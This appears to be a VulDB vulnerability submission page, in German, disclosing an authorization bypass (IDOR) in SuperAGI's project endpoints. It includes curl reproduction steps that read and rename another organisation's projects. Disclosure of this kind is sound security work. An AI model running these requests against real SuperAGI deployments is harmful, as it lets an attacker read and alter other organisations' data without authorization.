Submit #791082: SuperAGI up to c3c1982 Authorization Bypass Through User-Controlled Key (CWE-639)info

TitelSuperAGI up to c3c1982 Authorization Bypass Through User-Controlled Key (CWE-639)
Beschreibung# Technical Details An Insecure Direct Object Reference (IDOR) exists in the `get_project`, `update_project`, and `get_projects_organisation` methods in `superagi/controllers/project.py` of SuperAGI. The application fails to verify that the target project or organization belongs to the requesting user. All three endpoints only validate the JWT token via `Depends(check_auth)` but perform no organization membership verification. # Vulnerable Code File: superagi/controllers/project.py Method: get_project (lines 70-89), update_project (lines 92-124), get_projects_organisation (lines 127-151) Why: All endpoints use attacker-controlled `project_id` or `organisation_id` URL parameters without any ownership check, allowing cross-organization data access and modification. # Reproduction 1. Authenticate with an attacker account and obtain a valid JWT. 2. List all projects for victim's organization: curl -s -H "Authorization: Bearer $JWT" "http://localhost:3000/api/projects/get/organisation/3" 3. Read a specific victim project: curl -s -H "Authorization: Bearer $JWT" "http://localhost:3000/api/projects/get/1" 4. Modify victim's project name: curl -s -X PUT -H "Authorization: Bearer $JWT" -H "Content-Type: application/json" "http://localhost:3000/api/projects/update/1" -d '{"name":"HACKED Project","description":"compromised"}' # Impact - Information Disclosure: Attacker enumerates all projects and their configurations across all organizations. - Data Integrity: Project names and descriptions can be modified, disrupting team workflows. - Reconnaissance: Project listing reveals organizational structure and agent deployment patterns.
Quelle⚠️ https://gist.github.com/YLChen-007/ac40da2253c7364d043c0dfe3275190b
Benutzer
 Eric-z (UID 95890)
Einreichung27.03.2026 13:01 (vor 24 Tagen)
Moderieren19.04.2026 18:13 (23 days later)
StatusAkzeptiert
VulDB Eintrag358249 [TransformerOptimus SuperAGI bis 0.0.14 project.py erweiterte Rechte]
Punkte20

ZurückÜbersichtWeiter

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!